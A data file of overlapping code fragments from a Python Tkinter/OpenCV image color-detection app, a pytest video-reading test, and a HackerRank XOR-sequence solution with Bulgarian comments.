"image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path",
"# open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4",
"np import urllib.request import pandas as pd from tkinter import filedialog from PIL",
"my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl)",
"Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn =",
"in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum",
"from PIL import ImageTk,Image import pyperclip as pc root = Tk() root.title(\"Image Color",
"= Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label",
"to image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType",
"img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10),",
"files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2 btn image selectimg2 =",
"# open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1",
"btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if",
"pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance from all colors and get",
"str(b) +\" \"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale text according",
"0 #Reading csv file with pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"]",
"def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg",
"Color name and RGB values ) text = getColorName.cname + ' R='+ str(r)",
"open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 =",
"#resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260)",
"global b,g,r,xpos,ypos, clicked clicked = True xpos = x ypos = y b,g,r",
"column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance",
"according to image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800)",
"import filedialog from PIL import ImageTk,Image import pyperclip as pc root = Tk()",
"resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable",
"pandas as pd from tkinter import filedialog from PIL import ImageTk,Image import pyperclip",
"display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when",
"colours we will display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break",
"getColorName(R,G,B): minimum = 10000 for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) +",
"root.filename print(image_path) # open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn",
"#cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display text in",
"click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked =",
"resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen",
"clicked clicked = True xpos = x ypos = y b,g,r = img[y,x]",
"clicked = True xpos = x ypos = y b,g,r = img[y,x] b",
"ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select",
"color def getColorName(R,G,B): minimum = 10000 for i in range(len(csv)): d = abs(R-",
"= 10000 for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+",
"#Reading csv file with pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv",
"thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to",
"and get the most matching color def getColorName(R,G,B): minimum = 10000 for i",
"calculate minimum distance from all colors and get the most matching color def",
"Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img = urlimg.image else : #Reading the",
"the image with opencv img = cv2.imread(image_path) #declaring global variables (are used later",
"+ ' R='+ str(r) + ' G='+ str(g) + ' B='+ str(b) +\"",
"= urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open",
"image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry =",
"= img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours",
"min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1)",
"finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) #",
"my_btn.place(x=100,y=150) # open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image",
"as pd from tkinter import filedialog from PIL import ImageTk,Image import pyperclip as",
"= Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED)",
"pyperclip as pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path =",
"image_path == \"\": img = urlimg.image else : #Reading the image with opencv",
"image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open",
"= img[y,x] b = int(b) g = int(g) r = int(r) cv2.namedWindow('Image Color",
"int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to",
"distance from all colors and get the most matching color def getColorName(R,G,B): minimum",
"= abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname",
"variables (are used later on) clicked = False r = g = b",
"root.mainloop() if image_path == \"\": img = urlimg.image else : #Reading the image",
"and RGB values ) text = getColorName.cname + ' R='+ str(r) + '",
"i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum):",
"root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global image_path root.filename",
"g = b = hexcode = xpos = ypos = 0 #Reading csv",
"from all colors and get the most matching color def getColorName(R,G,B): minimum =",
"getColorName.cname + ' R='+ str(r) + ' G='+ str(g) + ' B='+ str(b)",
"cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos = x ypos = y",
"b = int(b) g = int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image",
"= img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1",
"#declaring global variables (are used later on) clicked = False r = g",
"= filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename",
"pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062')",
"code to clipboard pc.copy(getColorName.hexcode) #scale text according to image size imageWidth = img.shape[0]",
"#Break the loop when User hits 'enter' key if cv2.waitKey(20) & 0xFF ==13:",
"+ ' B='+ str(b) +\" \"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode)",
"resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path ==",
"fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50),",
"+ ' G='+ str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode #copying color",
"pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) #",
"B='+ str(b) +\" \"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale text",
"btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path",
"pd from tkinter import filedialog from PIL import ImageTk,Image import pyperclip as pc",
"ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response",
"= Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize",
"= g = b = hexcode = xpos = ypos = 0 #Reading",
"if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos = x",
"= Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img = urlimg.image else : #Reading",
"text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User",
"= int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image",
"' R='+ str(r) + ' G='+ str(g) + ' B='+ str(b) +\" \"+",
"= Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4,",
"as np import urllib.request import pandas as pd from tkinter import filedialog from",
"minimum distance from all colors and get the most matching color def getColorName(R,G,B):",
"image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2",
"my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\")",
"we will display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the",
"root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open():",
"urlimg.image else : #Reading the image with opencv img = cv2.imread(image_path) #declaring global",
"very light colours we will display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA)",
"colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits 'enter' key",
"RGB values ) text = getColorName.cname + ' R='+ str(r) + ' G='+",
"= image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn",
"str(r) + ' G='+ str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode #copying",
"Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn"
] |
[
"read_video(test_data): logging.info(\"Output in loop\") assert frame is not None, \"fail\" i+=1 assert i>0",
"for frame in read_video(test_data): logging.info(\"Output in loop\") assert frame is not None, \"fail\"",
"test_read_video(): test_data = \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i = 0 for frame in read_video(test_data): logging.info(\"Output",
"= \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i = 0 for frame in read_video(test_data): logging.info(\"Output in loop\")",
"frame in read_video(test_data): logging.info(\"Output in loop\") assert frame is not None, \"fail\" i+=1",
"0 for frame in read_video(test_data): logging.info(\"Output in loop\") assert frame is not None,",
"import read_video def test_read_video(): test_data = \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i = 0 for frame",
"def test_read_video(): test_data = \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i = 0 for frame in read_video(test_data):",
"\"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i = 0 for frame in read_video(test_data): logging.info(\"Output in loop\") assert",
"import pytest, logging from read_video import read_video def test_read_video(): test_data = \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR')",
"= 0 for frame in read_video(test_data): logging.info(\"Output in loop\") assert frame is not",
"from read_video import read_video def test_read_video(): test_data = \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i = 0",
"test_data = \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i = 0 for frame in read_video(test_data): logging.info(\"Output in",
"in read_video(test_data): logging.info(\"Output in loop\") assert frame is not None, \"fail\" i+=1 assert",
"#logging.info('ERROR') i = 0 for frame in read_video(test_data): logging.info(\"Output in loop\") assert frame",
"pytest, logging from read_video import read_video def test_read_video(): test_data = \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i",
"read_video import read_video def test_read_video(): test_data = \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i = 0 for",
"logging from read_video import read_video def test_read_video(): test_data = \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i =",
"read_video def test_read_video(): test_data = \"/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4\" #logging.info('ERROR') i = 0 for frame in",
"i = 0 for frame in read_video(test_data): logging.info(\"Output in loop\") assert frame is"
] |
[
"\"\"\" import math import os import random import re import sys MAX_BITS =",
"r) in enumerate(zip(l_bits, r_bits)): l //= 2 r //= 2 if (r -",
"// 2 return ones_in_groups + rem_ones def get_bit_vector_ones_counts(n, max_bit): ones_cnts = [] for",
"result def xor_sequence_2(l, r): result = 0 for i in range(l + 1,",
"group_size // 2: rem_ones = rem - group_size // 2 return ones_in_groups +",
"print(j, jf, sf, s) if (l - r + 1) % 2 !=",
"0 for j in range(r, l, -2): s ^= j jf = format(j,",
"j in range(r, l, -2): s ^= j jf = format(j, '05b') sf",
"0 for i, (l, r) in enumerate(zip(l_bits, r_bits)): l //= 2 r //=",
"= 17 def count_ones(n, bit_id): ones_in_group = 2**bit_id group_size = ones_in_group * 2",
"num_groups = (n + 1) // group_size ones_in_groups = num_groups * ones_in_group rem_ones",
"Sample Output 0: 7 9 15 \"\"\" \"\"\" 11110 11110 30 - Числото",
"q_itr in range(q): lr = input().split() l = int(lr[0]) r = int(lr[1]) result",
"ones_in_groups + rem_ones def get_bit_vector_ones_counts(n, max_bit): ones_cnts = [] for i in range(0,",
"r): result = 0 for i in range(l + 1, r + 1,",
"0: 7 9 15 \"\"\" \"\"\" 11110 11110 30 - Числото 11100 00010",
"= int(lr[0]) r = int(lr[1]) result = xor_sequence_3(l, r) fptr.write(str(result) + '\\n') fptr.close()",
"if num_ones % 2 != 0: result += 2**i return result def xor_sequence(l,",
"import os import random import re import sys MAX_BITS = 17 def count_ones(n,",
"= format(A_n(l), '04b') a_r = format(A_n(r), '04b') s = 0 for j in",
"1) // group_size ones_in_groups = num_groups * ones_in_group rem_ones = 0 rem =",
"2 != 0: result += 2**i return result def xor_sequence_2(l, r): result =",
"0 - нула 00110 00110 6 - числото = числото - 2 00100",
"in range(q): lr = input().split() l = int(lr[0]) r = int(lr[1]) result =",
"(n + 1) % group_size if rem > group_size // 2: rem_ones =",
"+ 1): num_ones = count_ones(n, bit_id=i) ones_cnts.append(num_ones) return ones_cnts def A_n(n): n_bits =",
"-2): s ^= j jf = format(j, '05b') sf = format(s, '05b') print(j,",
"10100 00010 2 - две 10010 10000 16 - числото = числото -",
"in enumerate(zip(l_bits, r_bits)): l //= 2 r //= 2 if (r - l)",
"1) % 2 != 0: return A_n(r) ^ result return result def xor_sequence_3(l,",
"01000 00000 0 - нула 00110 00110 6 - числото = числото -",
"10010 10000 16 - числото = числото - 6 10000 00000 0 -",
"rem_ones = rem - group_size // 2 return ones_in_groups + rem_ones def get_bit_vector_ones_counts(n,",
"2 01100 00010 2 - две 01010 01000 8 - числото = числото",
"10000 00000 0 - нула 01110 01110 14 - числото = числото -",
"in enumerate(zip(l_bits, r_bits)): if (r - l) % 2 != 0: result +=",
"jf = format(j, '05b') sf = format(s, '05b') print(j, jf, sf, s) if",
"числото - 2 01100 00010 2 - две 01010 01000 8 - числото",
"= get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for",
"get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for i, (l, r) in enumerate(zip(l_bits, r_bits)): l",
"00110 00110 6 - числото = числото - 2 00100 00010 2 -",
"% group_size if rem > group_size // 2: rem_ones = rem - group_size",
"if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') q = int(input()) l, r",
"9 Sample Output 0: 7 9 15 \"\"\" \"\"\" 11110 11110 30 -",
"for i, (l, r) in enumerate(zip(l_bits, r_bits)): if (r - l) % 2",
"3 2 4 2 8 5 9 Sample Output 0: 7 9 15",
"import math import os import random import re import sys MAX_BITS = 17",
"10110 10110 22 - числото = числото - 2 10100 00010 2 -",
"!= 0: result += 2**i return result def xor_sequence(l, r): l_bits = get_bit_vector_ones_counts(l",
"l + 1) % 2 != 0: return A_n(r) ^ result return result",
"00100 00010 2 - две (отговор) \"\"\" import math import os import random",
"format(s, '05b') print(j, jf, sf, s) if (l - r + 1) %",
"+ rem_ones def get_bit_vector_ones_counts(n, max_bit): ones_cnts = [] for i in range(0, max_bit",
"jf, sf, s) for q_itr in range(q): lr = input().split() l = int(lr[0])",
"get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for i, (l, r) in enumerate(zip(l_bits, r_bits)): if",
"14 - числото = числото - 2 01100 00010 2 - две 01010",
"нула 00110 00110 6 - числото = числото - 2 00100 00010 2",
"= format(A_n(r), '04b') s = 0 for j in range(r, l, -2): s",
"- две 01010 01000 8 - числото = числото - 6 01000 00000",
"24 - числото = числото - 6 11000 00000 0 - нула 10110",
"group_size if rem > group_size // 2: rem_ones = rem - group_size //",
"if (r - l) % 2 != 0: result += 2**i return result",
"rem - group_size // 2 return ones_in_groups + rem_ones def get_bit_vector_ones_counts(n, max_bit): ones_cnts",
"= get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for i, (l, r) in enumerate(zip(l_bits, r_bits)):",
"1) % 2 != 0: al = A_n(l) s ^= al print(j, jf,",
"2 10100 00010 2 - две 10010 10000 16 - числото = числото",
"range(0, max_bit + 1): num_ones = count_ones(n, bit_id=i) ones_cnts.append(num_ones) return ones_cnts def A_n(n):",
"// group_size ones_in_groups = num_groups * ones_in_group rem_ones = 0 rem = (n",
"q = int(input()) l, r = 2, 31 a_l = format(A_n(l), '04b') a_r",
"8 5 9 Sample Output 0: 7 9 15 \"\"\" \"\"\" 11110 11110",
"0: al = A_n(l) s ^= al print(j, jf, sf, s) for q_itr",
"return result def xor_sequence_3(l, r): l_bits = get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS) r_bits =",
"- 6 11000 00000 0 - нула 10110 10110 22 - числото =",
"01010 01000 8 - числото = числото - 6 01000 00000 0 -",
"(l, r) in enumerate(zip(l_bits, r_bits)): l //= 2 r //= 2 if (r",
"l) % 2 != 0: result += 2**i return result if __name__ ==",
"+ 1) % 2 != 0: return A_n(r) ^ result return result def",
"0 for i in range(l + 1, r + 1, 2): result ^=",
"= (n + 1) % group_size if rem > group_size // 2: rem_ones",
"import random import re import sys MAX_BITS = 17 def count_ones(n, bit_id): ones_in_group",
"//= 2 if (r - l) % 2 != 0: result += 2**i",
"* ones_in_group rem_ones = 0 rem = (n + 1) % group_size if",
"2**i return result def xor_sequence(l, r): l_bits = get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS) r_bits",
"= input().split() l = int(lr[0]) r = int(lr[1]) result = xor_sequence_3(l, r) fptr.write(str(result)",
"- https://www.hackerrank.com/challenges/xor-se/problem Sample Input 0: 3 2 4 2 8 5 9 Sample",
"bit_id): ones_in_group = 2**bit_id group_size = ones_in_group * 2 num_groups = (n +",
"01110 01110 14 - числото = числото - 2 01100 00010 2 -",
"range(l + 1, r + 1, 2): result ^= i if (r -",
"% 2 != 0: result += 2**i return result if __name__ == '__main__':",
"Числото 11100 00010 2 - две 11010 11000 24 - числото = числото",
"r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for i, (l, r) in enumerate(zip(l_bits,",
"6 01000 00000 0 - нула 00110 00110 6 - числото = числото",
"числото = числото - 6 01000 00000 0 - нула 00110 00110 6",
"числото - 6 01000 00000 0 - нула 00110 00110 6 - числото",
"(l - r + 1) % 2 != 0: al = A_n(l) s",
"11110 30 - Числото 11100 00010 2 - две 11010 11000 24 -",
"max_bit=MAX_BITS) result = 0 for i, (l, r) in enumerate(zip(l_bits, r_bits)): if (r",
"= A_n(l) s ^= al print(j, jf, sf, s) for q_itr in range(q):",
"- l) % 2 != 0: result += 2**i return result def xor_sequence_2(l,",
"l) % 2 != 0: result += 2**i return result def xor_sequence_2(l, r):",
"2 - две (отговор) \"\"\" import math import os import random import re",
"% 2 != 0: return A_n(r) ^ result return result def xor_sequence_3(l, r):",
"a_l = format(A_n(l), '04b') a_r = format(A_n(r), '04b') s = 0 for j",
"__name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') q = int(input()) l, r =",
"if (l - r + 1) % 2 != 0: al = A_n(l)",
"max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for i, (l, r) in",
"(n + 1) // group_size ones_in_groups = num_groups * ones_in_group rem_ones = 0",
"group_size ones_in_groups = num_groups * ones_in_group rem_ones = 0 rem = (n +",
"- числото = числото - 2 01100 00010 2 - две 01010 01000",
"r) in enumerate(zip(l_bits, r_bits)): if (r - l) % 2 != 0: result",
"\"\"\" 11110 11110 30 - Числото 11100 00010 2 - две 11010 11000",
"#!/bin/python3 \"\"\" Xor-sequence SRC - https://www.hackerrank.com/challenges/xor-se/problem Sample Input 0: 3 2 4 2",
"- числото = числото - 2 10100 00010 2 - две 10010 10000",
"Xor-sequence SRC - https://www.hackerrank.com/challenges/xor-se/problem Sample Input 0: 3 2 4 2 8 5",
"0: result += 2**i return result if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'],",
"= get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0 for",
"l_bits = get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result = 0",
"for q_itr in range(q): lr = input().split() l = int(lr[0]) r = int(lr[1])",
"11010 11000 24 - числото = числото - 6 11000 00000 0 -",
"bit_id=i) ones_cnts.append(num_ones) return ones_cnts def A_n(n): n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS) result = 0",
"= 2, 31 a_l = format(A_n(l), '04b') a_r = format(A_n(r), '04b') s =",
"= числото - 6 01000 00000 0 - нула 00110 00110 6 -",
"(r - l) % 2 != 0: result += 2**i return result if",
"00010 2 - две 01010 01000 8 - числото = числото - 6",
"r_bits)): l //= 2 r //= 2 if (r - l) % 2",
"числото = числото - 2 00100 00010 2 - две (отговор) \"\"\" import",
"in range(0, max_bit + 1): num_ones = count_ones(n, bit_id=i) ones_cnts.append(num_ones) return ones_cnts def",
"1) % group_size if rem > group_size // 2: rem_ones = rem -",
"return ones_in_groups + rem_ones def get_bit_vector_ones_counts(n, max_bit): ones_cnts = [] for i in",
"- l) % 2 != 0: result += 2**i return result if __name__",
"def xor_sequence(l, r): l_bits = get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS)",
"'04b') a_r = format(A_n(r), '04b') s = 0 for j in range(r, l,",
"format(A_n(l), '04b') a_r = format(A_n(r), '04b') s = 0 for j in range(r,",
"нула 01110 01110 14 - числото = числото - 2 01100 00010 2",
"result += 2**i return result def xor_sequence_2(l, r): result = 0 for i",
"r = 2, 31 a_l = format(A_n(l), '04b') a_r = format(A_n(r), '04b') s",
"2 != 0: return A_n(r) ^ result return result def xor_sequence_3(l, r): l_bits",
"2 return ones_in_groups + rem_ones def get_bit_vector_ones_counts(n, max_bit): ones_cnts = [] for i",
"- 6 10000 00000 0 - нула 01110 01110 14 - числото =",
"xor_sequence_3(l, r): l_bits = get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS) r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS) result",
"^= al print(j, jf, sf, s) for q_itr in range(q): lr = input().split()",
